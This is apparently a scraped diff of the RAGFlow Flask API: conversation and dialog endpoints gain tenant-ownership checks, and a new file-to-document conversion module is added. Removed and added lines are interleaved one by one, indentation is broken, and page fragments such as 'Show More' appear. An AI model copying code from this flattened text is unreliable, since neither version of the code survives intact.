+        conv = {"id": conv_id, "dialog_id": req["dialog_id"], "name": name, "message": [{"role": "assistant", "content": dia.prompt_config["prologue"]}],"user_id": current_user.id}
-            return get_data_error_result(retmsg="Conversation not found!")
+        ConversationService.save(**conv)
-        conv = conv.to_dict()
+        return get_json_result(data=conv)
-        return get_json_result(data=conv)
+    except Exception as e:
-    except Exception as e:
+        return server_error_response(e)
-        return server_error_response(e)
+
-
+
-
+@manager.route("/get", methods=["GET"])  # noqa: F821
-@manager.route('/rm', methods=['POST'])
+@login_required
-@login_required
+def get():
-def rm():
+    conv_id = request.args["conversation_id"]
-    conv_ids = request.json["conversation_ids"]
+    try:
-    try:
+        e, conv = ConversationService.get_by_id(conv_id)
-        for cid in conv_ids:
+        if not e:
-            ConversationService.delete_by_id(cid)
+            return get_data_error_result(message="Conversation not found!")
-        return get_json_result(data=True)
+        tenants = UserTenantService.query(user_id=current_user.id)
-    except Exception as e:
+        avatar = None
-        return server_error_response(e)
+        for tenant in tenants:
-
+            dialog = DialogService.query(tenant_id=tenant.tenant_id, id=conv.dialog_id)
-
+            if dialog and len(dialog) > 0:
-@manager.route('/list', methods=['GET'])
+                avatar = dialog[0].icon
-@login_required
+                break
-def list_convsersation():
+        else:
-    dialog_id = request.args["dialog_id"]
+            return get_json_result(data=False, message="Only owner of conversation authorized for this operation.", code=settings.RetCode.OPERATING_ERROR)
-    try:
+
-        convs = ConversationService.query(
+        for ref in conv.reference:
-            dialog_id=dialog_id,
+            if isinstance(ref, list):
-            order_by=ConversationService.model.create_time,
+                continue
-            reverse=True)
+            ref["chunks"] = chunks_format(ref)
-        convs = [d.to_dict() for d in convs]
+
-        return get_json_result(data=convs)
+        conv = conv.to_dict()
-    except Exception as e:
+        conv["avatar"] = avatar
-        return server_error_response(e)
+        return get_json_result(data=conv)
-
+    except Exception as e:
-
+        return server_error_response(e)
-@manager.route('/completion', methods=['POST'])
+
-@login_required
+
-@validate_request("conversation_id", "messages")
+@manager.route("/getsse/<dialog_id>", methods=["GET"])  # type: ignore # noqa: F821
-def completion():
+def getsse(dialog_id):
-    req = request.json
+    token = request.headers.get("Authorization").split()
-    msg = []
+    if len(token) != 2:
-    for m in req["messages"]:
+        return get_data_error_result(message='Authorization is not valid!"')
-        if m["role"] == "system":
+    token = token[1]
-            continue
+    objs = APIToken.query(beta=token)
-        if m["role"] == "assistant" and not msg:
+    if not objs:
-            continue
+        return get_data_error_result(message='Authentication error: API key is invalid!"')
-        msg.append({"role": m["role"], "content": m["content"]})
+    try:
-    try:
+        e, conv = DialogService.get_by_id(dialog_id)
-        e, conv = ConversationService.get_by_id(req["conversation_id"])
+        if not e:
-        if not e:
+            return get_data_error_result(message="Dialog not found!")
-            return get_data_error_result(retmsg="Conversation not found!")
+        conv = conv.to_dict()
-        conv.message.append(msg[-1])
+        conv["avatar"] = conv["icon"]
-        e, dia = DialogService.get_by_id(conv.dialog_id)
+        del conv["icon"]
-        if not e:
+        return get_json_result(data=conv)
-            return get_data_error_result(retmsg="Dialog not found!")
+    except Exception as e:
-        del req["conversation_id"]
+        return server_error_response(e)
-        del req["messages"]
+
-        ans = chat(dia, msg, **req)
+
-        if not conv.reference:
+@manager.route("/rm", methods=["POST"])  # noqa: F821
-            conv.reference = []
+@login_required
-        conv.reference.append(ans["reference"])
+def rm():
-        conv.message.append({"role": "assistant", "content": ans["answer"]})
+    conv_ids = request.json["conversation_ids"]
-        ConversationService.update_by_id(conv.id, conv.to_dict())
+    try:
-        return get_json_result(data=ans)
+        for cid in conv_ids:
-    except Exception as e:
+            exist, conv = ConversationService.get_by_id(cid)
-        return server_error_response(e)
+            if not exist:
-
+                return get_data_error_result(message="Conversation not found!")
            tenants = UserTenantService.query(user_id=current_user.id)
            for tenant in tenants:
                if DialogService.query(tenant_id=tenant.tenant_id, id=conv.dialog_id):
                    break
            else:
                return get_json_result(data=False, message="Only owner of conversation authorized for this operation.", code=settings.RetCode.OPERATING_ERROR)
            ConversationService.delete_by_id(cid)
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
@manager.route("/list", methods=["GET"])  # noqa: F821
@login_required
 def list_conversation():
    dialog_id = request.args["dialog_id"]
    try:
        if not DialogService.query(tenant_id=current_user.id, id=dialog_id):
            return get_json_result(data=False, message="Only owner of dialog authorized for this operation.", code=settings.RetCode.OPERATING_ERROR)
        convs = ConversationService.query(dialog_id=dialog_id, order_by=ConversationService.model.create_time, reverse=True)
        convs = [d.to_dict() for d in convs]
        return get_json_result(data=convs)
    except Exception as e:
        return server_error_response(e)
@manager.route("/completion", methods=["POST"])  # noqa: F821
@login_required
@validate_request("conversation_id", "messages")
 def completion():
    req = request.json
    msg = []
    for m in req["messages"]:
        if m["role"] == "system":
            continue
        if m["role"] == "assistant" and not msg:
            continue
        msg.append(m)
    message_id = msg[-1].get("id")
    try:
        e, conv = ConversationService.get_by_id(req["conversation_id"])
        if not e:
            return get_data_error_result(message="Conversation not found!")
        conv.message = deepcopy(req["messages"])
        e, dia = DialogService.get_by_id(conv.dialog_id)
        if not e:
            return get_data_error_result(message="Dialog not found!")
        del req["conversation_id"]
        del req["messages"]
        if not conv.reference:
            conv.reference = []
        else:
            for ref in conv.reference:
                if isinstance(ref, list):
                    continue
                ref["chunks"] = chunks_format(ref)
        if not conv.reference:
            conv.reference = []
        conv.reference.append({"chunks": [], "doc_aggs": []})
        def stream():
            nonlocal dia, msg, req, conv
            try:
                for ans in chat(dia, msg, True, **req):
                    ans = structure_answer(conv, ans, message_id, conv.id)
                    yield "data:" + json.dumps({"code": 0, "message": "", "data": ans}, ensure_ascii=False) + "\n\n"
                ConversationService.update_by_id(conv.id, conv.to_dict())
            except Exception as e:
                traceback.print_exc()
                yield "data:" + json.dumps({"code": 500, "message": str(e), "data": {"answer": "**ERROR**: " + str(e), "reference": []}}, ensure_ascii=False) + "\n\n"
            yield "data:" + json.dumps({"code": 0, "message": "", "data": True}, ensure_ascii=False) + "\n\n"
        if req.get("stream", True):
            resp = Response(stream(), mimetype="text/event-stream")
            resp.headers.add_header("Cache-control", "no-cache")
            resp.headers.add_header("Connection", "keep-alive")
            resp.headers.add_header("X-Accel-Buffering", "no")
            resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
            return resp
        else:
            answer = None
            for ans in chat(dia, msg, **req):
                answer = structure_answer(conv, ans, message_id, conv.id)
                ConversationService.update_by_id(conv.id, conv.to_dict())
                break
            return get_json_result(data=answer)
    except Exception as e:
        return server_error_response(e)
@manager.route("/tts", methods=["POST"])  # noqa: F821
@login_required
 def tts():
    req = request.json
    text = req["text"]
    tenants = TenantService.get_info_by(current_user.id)
    if not tenants:
        return get_data_error_result(message="Tenant not found!")
    tts_id = tenants[0]["tts_id"]
    if not tts_id:
        return get_data_error_result(message="No default TTS model is set")
    tts_mdl = LLMBundle(tenants[0]["tenant_id"], LLMType.TTS, tts_id)
    def stream_audio():
        try:
            for txt in re.split(r"[，。/《》？；：！\n\r:;]+", text):
                for chunk in tts_mdl.tts(txt):
                    yield chunk
        except Exception as e:
            yield ("data:" + json.dumps({"code": 500, "message": str(e), "data": {"answer": "**ERROR**: " + str(e)}}, ensure_ascii=False)).encode("utf-8")
    resp = Response(stream_audio(), mimetype="audio/mpeg")
    resp.headers.add_header("Cache-Control", "no-cache")
    resp.headers.add_header("Connection", "keep-alive")
    resp.headers.add_header("X-Accel-Buffering", "no")
    return resp
@manager.route("/delete_msg", methods=["POST"])  # noqa: F821
@login_required
@validate_request("conversation_id", "message_id")
 def delete_msg():
    req = request.json
    e, conv = ConversationService.get_by_id(req["conversation_id"])
    if not e:
        return get_data_error_result(message="Conversation not found!")
    conv = conv.to_dict()
    for i, msg in enumerate(conv["message"]):
        if req["message_id"] != msg.get("id", ""):
            continue
        assert conv["message"][i + 1]["id"] == req["message_id"]
        conv["message"].pop(i)
        conv["message"].pop(i)
        conv["reference"].pop(max(0, i // 2 - 1))
        break
    ConversationService.update_by_id(conv["id"], conv)
    return get_json_result(data=conv)
@manager.route("/thumbup", methods=["POST"])  # noqa: F821
@login_required
@validate_request("conversation_id", "message_id")
 def thumbup():
    req = request.json
    e, conv = ConversationService.get_by_id(req["conversation_id"])
    if not e:
        return get_data_error_result(message="Conversation not found!")
    up_down = req.get("thumbup")
    feedback = req.get("feedback", "")
    conv = conv.to_dict()
    for i, msg in enumerate(conv["message"]):
        if req["message_id"] == msg.get("id", "") and msg.get("role", "") == "assistant":
            if up_down:
                msg["thumbup"] = True
                if "feedback" in msg:
                    del msg["feedback"]
            else:
                msg["thumbup"] = False
                if feedback:
                    msg["feedback"] = feedback
            break
    ConversationService.update_by_id(conv["id"], conv)
    return get_json_result(data=conv)
@manager.route("/ask", methods=["POST"])  # noqa: F821
@login_required
@validate_request("question", "kb_ids")
 def ask_about():
    req = request.json
    uid = current_user.id
    def stream():
        nonlocal req, uid
        try:
            for ans in ask(req["question"], req["kb_ids"], uid):
                yield "data:" + json.dumps({"code": 0, "message": "", "data": ans}, ensure_ascii=False) + "\n\n"
        except Exception as e:
            yield "data:" + json.dumps({"code": 500, "message": str(e), "data": {"answer": "**ERROR**: " + str(e), "reference": []}}, ensure_ascii=False) + "\n\n"
        yield "data:" + json.dumps({"code": 0, "message": "", "data": True}, ensure_ascii=False) + "\n\n"
    resp = Response(stream(), mimetype="text/event-stream")
    resp.headers.add_header("Cache-control", "no-cache")
    resp.headers.add_header("Connection", "keep-alive")
    resp.headers.add_header("X-Accel-Buffering", "no")
    resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
    return resp
@manager.route("/mindmap", methods=["POST"])  # noqa: F821
@login_required
@validate_request("question", "kb_ids")
 def mindmap():
    req = request.json
    kb_ids = req["kb_ids"]
    e, kb = KnowledgebaseService.get_by_id(kb_ids[0])
    if not e:
        return get_data_error_result(message="Knowledgebase not found!")
    embd_mdl = LLMBundle(kb.tenant_id, LLMType.EMBEDDING, llm_name=kb.embd_id)
    chat_mdl = LLMBundle(current_user.id, LLMType.CHAT)
    question = req["question"]
    ranks = settings.retrievaler.retrieval(question, embd_mdl, kb.tenant_id, kb_ids, 1, 12, 0.3, 0.3, aggs=False, rank_feature=label_question(question, [kb]))
    mindmap = MindMapExtractor(chat_mdl)
    mind_map = trio.run(mindmap, [c["content_with_weight"] for c in ranks["chunks"]])
    mind_map = mind_map.output
    if "error" in mind_map:
        return server_error_response(Exception(mind_map["error"]))
    return get_json_result(data=mind_map)
@manager.route("/related_questions", methods=["POST"])  # noqa: F821
@login_required
@validate_request("question")
 def related_questions():
    req = request.json
    question = req["question"]
    chat_mdl = LLMBundle(current_user.id, LLMType.CHAT)
    prompt = """
 Role: You are an AI language model assistant tasked with generating 5-10 related questions based on a user’s original query. These questions should help expand the search query scope and improve search relevance.
 Instructions:
 	Input: You are provided with a user’s question.
 	Output: Generate 5-10 alternative questions that are related to the original user question. These alternatives should help retrieve a broader range of relevant documents from a vector database.
 	Context: Focus on rephrasing the original question in different ways, making sure the alternative questions are diverse but still connected to the topic of the original query. Do not create overly obscure, irrelevant, or unrelated questions.
 	Fallback: If you cannot generate any relevant alternatives, do not return any questions.
 	Guidance:
 	1. Each alternative should be unique but still relevant to the original query.
 	2. Keep the phrasing clear, concise, and easy to understand.
 	3. Avoid overly technical jargon or specialized terms unless directly relevant.
 	4. Ensure that each question contributes towards improving search results by broadening the search angle, not narrowing it.
 Example:
 Original Question: What are the benefits of electric vehicles?
 Alternative Questions:
 	1. How do electric vehicles impact the environment?
 	2. What are the advantages of owning an electric car?
 	3. What is the cost-effectiveness of electric vehicles?
 	4. How do electric vehicles compare to traditional cars in terms of fuel efficiency?
 	5. What are the environmental benefits of switching to electric cars?
 	6. How do electric vehicles help reduce carbon emissions?
 	7. Why are electric vehicles becoming more popular?
 	8. What are the long-term savings of using electric vehicles?
 	9. How do electric vehicles contribute to sustainability?
 	10. What are the key benefits of electric vehicles for consumers?
 Reason:
 	Rephrasing the original query into multiple alternative questions helps the user explore different aspects of their search topic, improving the quality of search results.
 	These questions guide the search engine to provide a more comprehensive set of relevant documents.
 """
    ans = chat_mdl.chat(
        prompt,
        [
            {
                "role": "user",
                "content": f"""
 Keywords: {question}
 Related search terms:
    """,
            }
        ],
        {"temperature": 0.9},
    )
    return get_json_result(data=[re.sub(r"^[0-9]\. ", "", a) for a in ans.split("\n") if re.match(r"^[0-9]\. ", a)])
--- a/api/apps/dialog_app.py
+++ b/api/apps/dialog_app.py
@ -1,170 +1,176 @@
-#
+#
-#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
+#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
-#
+#
-#  Licensed under the Apache License, Version 2.0 (the "License");
+#  Licensed under the Apache License, Version 2.0 (the "License");
-#  you may not use this file except in compliance with the License.
+#  you may not use this file except in compliance with the License.
-#  You may obtain a copy of the License at
+#  You may obtain a copy of the License at
-#
+#
-#      http://www.apache.org/licenses/LICENSE-2.0
+#      http://www.apache.org/licenses/LICENSE-2.0
-#
+#
-#  Unless required by applicable law or agreed to in writing, software
+#  Unless required by applicable law or agreed to in writing, software
-#  distributed under the License is distributed on an "AS IS" BASIS,
+#  distributed under the License is distributed on an "AS IS" BASIS,
-#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#  See the License for the specific language governing permissions and
+#  See the License for the specific language governing permissions and
-#  limitations under the License.
+#  limitations under the License.
-#
+#
-
+
-from flask import request
+from flask import request
-from flask_login import login_required, current_user
+from flask_login import login_required, current_user
-from api.db.services.dialog_service import DialogService
+from api.db.services.dialog_service import DialogService
-from api.db import StatusEnum
+from api.db import StatusEnum
-from api.db.services.knowledgebase_service import KnowledgebaseService
+from api.db.services.llm_service import TenantLLMService
-from api.db.services.user_service import TenantService
+from api.db.services.knowledgebase_service import KnowledgebaseService
-from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
+from api.db.services.user_service import TenantService, UserTenantService
-from api.utils import get_uuid
+from api import settings
-from api.utils.api_utils import get_json_result
+from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
-
+from api.utils import get_uuid
-
+from api.utils.api_utils import get_json_result
-@manager.route('/set', methods=['POST'])
+
-@login_required
+
-def set_dialog():
+@manager.route('/set', methods=['POST'])  # noqa: F821
-    req = request.json
+@validate_request("prompt_config")
-    dialog_id = req.get("dialog_id")
+@login_required
-    name = req.get("name", "New Dialog")
+def set_dialog():
-    description = req.get("description", "A helpful Dialog")
+    req = request.json
-    top_n = req.get("top_n", 6)
+    dialog_id = req.get("dialog_id")
-    similarity_threshold = req.get("similarity_threshold", 0.1)
+    name = req.get("name", "New Dialog")
-    vector_similarity_weight = req.get("vector_similarity_weight", 0.3)
+    if not isinstance(name, str):
-    llm_setting = req.get("llm_setting", {
+        return get_data_error_result(message="Dialog name must be string.")
-        "temperature": 0.1,
+    if name.strip() == "":
-        "top_p": 0.3,
+        return get_data_error_result(message="Dialog name can't be empty.")
-        "frequency_penalty": 0.7,
+    if len(name.encode("utf-8")) > 255:
-        "presence_penalty": 0.4,
+        return get_data_error_result(message=f"Dialog name length is {len(name)} which is larger than 255")
-        "max_tokens": 215
+    description = req.get("description", "A helpful dialog")
-    })
+    icon = req.get("icon", "")
-    default_prompt = {
+    top_n = req.get("top_n", 6)
-        "system": """你是一个智能助手，请总结知识库的内容来回答问题，请列举知识库中的数据详细回答。当所有知识库内容都与问题无关时，你的回答必须包括“知识库中未找到您要的答案！”这句话。回答需要考虑聊天历史。
+    top_k = req.get("top_k", 1024)
-以下是知识库：
+    rerank_id = req.get("rerank_id", "")
-{knowledge}
+    if not rerank_id:
-以上是知识库。""",
+        req["rerank_id"] = ""
-        "prologue": "您好，我是您的助手小樱，长得可爱又善良，can I help you?",
+    similarity_threshold = req.get("similarity_threshold", 0.1)
-        "parameters": [
+    vector_similarity_weight = req.get("vector_similarity_weight", 0.3)
-            {"key": "knowledge", "optional": False}
+    llm_setting = req.get("llm_setting", {})
-        ],
+    prompt_config = req["prompt_config"]
-        "empty_response": "Sorry! 知识库中未找到相关内容！"
+
-    }
+    if not req.get("kb_ids", []) and not prompt_config.get("tavily_api_key") and "{knowledge}" in prompt_config['system']:
-    prompt_config = req.get("prompt_config", default_prompt)
+        return get_data_error_result(message="Please remove `{knowledge}` in system prompt since no knowledge base/Tavily used here.")
-
+
-    if not prompt_config["system"]:
+    for p in prompt_config["parameters"]:
-        prompt_config["system"] = default_prompt["system"]
+        if p["optional"]:
-    # if len(prompt_config["parameters"]) < 1:
+            continue
-    #     prompt_config["parameters"] = default_prompt["parameters"]
+        if prompt_config["system"].find("{%s}" % p["key"]) < 0:
-    # for p in prompt_config["parameters"]:
+            return get_data_error_result(
-    #     if p["key"] == "knowledge":break
+                message="Parameter '{}' is not used".format(p["key"]))
-    # else: prompt_config["parameters"].append(default_prompt["parameters"][0])
+
-
+    try:
-    for p in prompt_config["parameters"]:
+        e, tenant = TenantService.get_by_id(current_user.id)
-        if p["optional"]:
+        if not e:
-            continue
+            return get_data_error_result(message="Tenant not found!")
-        if prompt_config["system"].find("{%s}" % p["key"]) < 0:
+        kbs = KnowledgebaseService.get_by_ids(req.get("kb_ids", []))
-            return get_data_error_result(
+        embd_ids = [TenantLLMService.split_model_name_and_factory(kb.embd_id)[0] for kb in kbs]  # remove vendor suffix for comparison
-                retmsg="Parameter '{}' is not used".format(p["key"]))
+        embd_count = len(set(embd_ids))
-
+        if embd_count > 1:
-    try:
+            return get_data_error_result(message=f'Datasets use different embedding models: {[kb.embd_id for kb in kbs]}"')
-        e, tenant = TenantService.get_by_id(current_user.id)
+
-        if not e:
+        llm_id = req.get("llm_id", tenant.llm_id)
-            return get_data_error_result(retmsg="Tenant not found!")
+        if not dialog_id:
-        llm_id = req.get("llm_id", tenant.llm_id)
+            dia = {
-        if not dialog_id:
+                "id": get_uuid(),
-            if not req.get("kb_ids"):
+                "tenant_id": current_user.id,
-                return get_data_error_result(
+                "name": name,
-                    retmsg="Fail! Please select knowledgebase!")
+                "kb_ids": req.get("kb_ids", []),
-            dia = {
+                "description": description,
-                "id": get_uuid(),
+                "llm_id": llm_id,
-                "tenant_id": current_user.id,
+                "llm_setting": llm_setting,
-                "name": name,
+                "prompt_config": prompt_config,
-                "kb_ids": req["kb_ids"],
+                "top_n": top_n,
-                "description": description,
+                "top_k": top_k,
-                "llm_id": llm_id,
+                "rerank_id": rerank_id,
-                "llm_setting": llm_setting,
+                "similarity_threshold": similarity_threshold,
-                "prompt_config": prompt_config,
+                "vector_similarity_weight": vector_similarity_weight,
-                "top_n": top_n,
+                "icon": icon
-                "similarity_threshold": similarity_threshold,
+            }
-                "vector_similarity_weight": vector_similarity_weight
+            if not DialogService.save(**dia):
-            }
+                return get_data_error_result(message="Fail to new a dialog!")
-            if not DialogService.save(**dia):
+            return get_json_result(data=dia)
-                return get_data_error_result(retmsg="Fail to new a dialog!")
+        else:
-            e, dia = DialogService.get_by_id(dia["id"])
+            del req["dialog_id"]
-            if not e:
+            if "kb_names" in req:
-                return get_data_error_result(retmsg="Fail to new a dialog!")
+                del req["kb_names"]
-            return get_json_result(data=dia.to_json())
+            if not DialogService.update_by_id(dialog_id, req):
-        else:
+                return get_data_error_result(message="Dialog not found!")
-            del req["dialog_id"]
+            e, dia = DialogService.get_by_id(dialog_id)
-            if "kb_names" in req:
+            if not e:
-                del req["kb_names"]
+                return get_data_error_result(message="Fail to update a dialog!")
-            if not DialogService.update_by_id(dialog_id, req):
+            dia = dia.to_dict()
-                return get_data_error_result(retmsg="Dialog not found!")
+            dia.update(req)
-            e, dia = DialogService.get_by_id(dialog_id)
+            dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
-            if not e:
+            return get_json_result(data=dia)
-                return get_data_error_result(retmsg="Fail to update a dialog!")
+    except Exception as e:
-            dia = dia.to_dict()
+        return server_error_response(e)
-            dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
+
-            return get_json_result(data=dia)
+
-    except Exception as e:
+@manager.route('/get', methods=['GET'])  # noqa: F821
-        return server_error_response(e)
+@login_required
-
+def get():
-
+    dialog_id = request.args["dialog_id"]
-@manager.route('/get', methods=['GET'])
+    try:
-@login_required
+        e, dia = DialogService.get_by_id(dialog_id)
-def get():
+        if not e:
-    dialog_id = request.args["dialog_id"]
+            return get_data_error_result(message="Dialog not found!")
-    try:
+        dia = dia.to_dict()
-        e, dia = DialogService.get_by_id(dialog_id)
+        dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
-        if not e:
+        return get_json_result(data=dia)
-            return get_data_error_result(retmsg="Dialog not found!")
+    except Exception as e:
-        dia = dia.to_dict()
+        return server_error_response(e)
-        dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
+
-        return get_json_result(data=dia)
+
-    except Exception as e:
+def get_kb_names(kb_ids):
-        return server_error_response(e)
+    ids, nms = [], []
-
+    for kid in kb_ids:
-
+        e, kb = KnowledgebaseService.get_by_id(kid)
-def get_kb_names(kb_ids):
+        if not e or kb.status != StatusEnum.VALID.value:
-    ids, nms = [], []
+            continue
-    for kid in kb_ids:
+        ids.append(kid)
-        e, kb = KnowledgebaseService.get_by_id(kid)
+        nms.append(kb.name)
-        if not e or kb.status != StatusEnum.VALID.value:
+    return ids, nms
-            continue
+
-        ids.append(kid)
+
-        nms.append(kb.name)
+@manager.route('/list', methods=['GET'])  # noqa: F821
-    return ids, nms
+@login_required
-
+def list_dialogs():
-
+    try:
-@manager.route('/list', methods=['GET'])
+        diags = DialogService.query(
-@login_required
+            tenant_id=current_user.id,
-def list():
+            status=StatusEnum.VALID.value,
-    try:
+            reverse=True,
-        diags = DialogService.query(
+            order_by=DialogService.model.create_time)
-            tenant_id=current_user.id,
+        diags = [d.to_dict() for d in diags]
-            status=StatusEnum.VALID.value,
+        for d in diags:
-            reverse=True,
+            d["kb_ids"], d["kb_names"] = get_kb_names(d["kb_ids"])
-            order_by=DialogService.model.create_time)
+        return get_json_result(data=diags)
-        diags = [d.to_dict() for d in diags]
+    except Exception as e:
-        for d in diags:
+        return server_error_response(e)
-            d["kb_ids"], d["kb_names"] = get_kb_names(d["kb_ids"])
+
-        return get_json_result(data=diags)
+
-    except Exception as e:
+@manager.route('/rm', methods=['POST'])  # noqa: F821
-        return server_error_response(e)
+@login_required
-
+@validate_request("dialog_ids")
-
+def rm():
-@manager.route('/rm', methods=['POST'])
+    req = request.json
-@login_required
+    dialog_list=[]
-@validate_request("dialog_ids")
+    tenants = UserTenantService.query(user_id=current_user.id)
-def rm():
+    try:
-    req = request.json
+        for id in req["dialog_ids"]:
-    try:
+            for tenant in tenants:
-        DialogService.update_many_by_id(
+                if DialogService.query(tenant_id=tenant.tenant_id, id=id):
-            [{"id": id, "status": StatusEnum.INVALID.value} for id in req["dialog_ids"]])
+                    break
-        return get_json_result(data=True)
+            else:
-    except Exception as e:
+                return get_json_result(
-        return server_error_response(e)
+                    data=False, message='Only owner of dialog authorized for this operation.',
                    code=settings.RetCode.OPERATING_ERROR)
            dialog_list.append({"id": id,"status":StatusEnum.INVALID.value})
        DialogService.update_many_by_id(dialog_list)
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
--- a/api/apps/document_app.py
+++ b/api/apps/document_app.py
--- a/api/apps/file2document_app.py
+++ b/api/apps/file2document_app.py
@ -0,0 +1,133 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License
 #
 from pathlib import Path
 from api.db.services.file2document_service import File2DocumentService
 from api.db.services.file_service import FileService
 from flask import request
 from flask_login import login_required, current_user
 from api.db.services.knowledgebase_service import KnowledgebaseService
 from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
 from api.utils import get_uuid
 from api.db import FileType
 from api.db.services.document_service import DocumentService
 from api import settings
 from api.utils.api_utils import get_json_result
@manager.route('/convert', methods=['POST'])  # noqa: F821
@login_required
@validate_request("file_ids", "kb_ids")
 def convert():
    req = request.json
    kb_ids = req["kb_ids"]
    file_ids = req["file_ids"]
    file2documents = []
    try:
        files = FileService.get_by_ids(file_ids)
        files_set = dict({file.id: file for file in files})
        for file_id in file_ids:
            file = files_set[file_id]
            if not file:
                return get_data_error_result(message="File not found!")
            file_ids_list = [file_id]
            if file.type == FileType.FOLDER.value:
                file_ids_list = FileService.get_all_innermost_file_ids(file_id, [])
            for id in file_ids_list:
                informs = File2DocumentService.get_by_file_id(id)
                # delete
                for inform in informs:
                    doc_id = inform.document_id
                    e, doc = DocumentService.get_by_id(doc_id)
                    if not e:
                        return get_data_error_result(message="Document not found!")
                    tenant_id = DocumentService.get_tenant_id(doc_id)
                    if not tenant_id:
                        return get_data_error_result(message="Tenant not found!")
                    if not DocumentService.remove_document(doc, tenant_id):
                        return get_data_error_result(
                            message="Database error (Document removal)!")
                File2DocumentService.delete_by_file_id(id)
                # insert
                for kb_id in kb_ids:
                    e, kb = KnowledgebaseService.get_by_id(kb_id)
                    if not e:
                        return get_data_error_result(
                            message="Can't find this knowledgebase!")
                    e, file = FileService.get_by_id(id)
                    if not e:
                        return get_data_error_result(
                            message="Can't find this file!")
                    doc = DocumentService.insert({
                        "id": get_uuid(),
                        "kb_id": kb.id,
                        "parser_id": FileService.get_parser(file.type, file.name, kb.parser_id),
                        "parser_config": kb.parser_config,
                        "created_by": current_user.id,
                        "type": file.type,
                        "name": file.name,
                        "suffix": Path(file.name).suffix.lstrip("."),
                        "location": file.location,
                        "size": file.size
                    })
                    file2document = File2DocumentService.insert({
                        "id": get_uuid(),
                        "file_id": id,
                        "document_id": doc.id,
                    })
                    file2documents.append(file2document.to_json())
        return get_json_result(data=file2documents)
    except Exception as e:
        return server_error_response(e)
@manager.route('/rm', methods=['POST'])  # noqa: F821
@login_required
@validate_request("file_ids")
 def rm():
    req = request.json
    file_ids = req["file_ids"]
    if not file_ids:
        return get_json_result(
            data=False, message='Lack of "Files ID"', code=settings.RetCode.ARGUMENT_ERROR)
    try:
        for file_id in file_ids:
            informs = File2DocumentService.get_by_file_id(file_id)
            if not informs:
                return get_data_error_result(message="Inform not found!")
            for inform in informs:
                if not inform:
                    return get_data_error_result(message="Inform not found!")
                File2DocumentService.delete_by_file_id(file_id)
                doc_id = inform.document_id
                e, doc = DocumentService.get_by_id(doc_id)
                if not e:
                    return get_data_error_result(message="Document not found!")
                tenant_id = DocumentService.get_tenant_id(doc_id)
                if not tenant_id:
                    return get_data_error_result(message="Tenant not found!")
                if not DocumentService.remove_document(doc, tenant_id):
                    return get_data_error_result(
                        message="Database error (Document removal)!")
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
--- a/Show More
+++ b/Show More
`@ -1 +1,2 @@`
	`*.sh text eol=lf`	`*.sh text eol=lf`
		`docker/entrypoint.sh text eol=lf executable`
		`@ -0,0 +1 @@`
							`from .deep_research import DeepResearcher as DeepResearcher`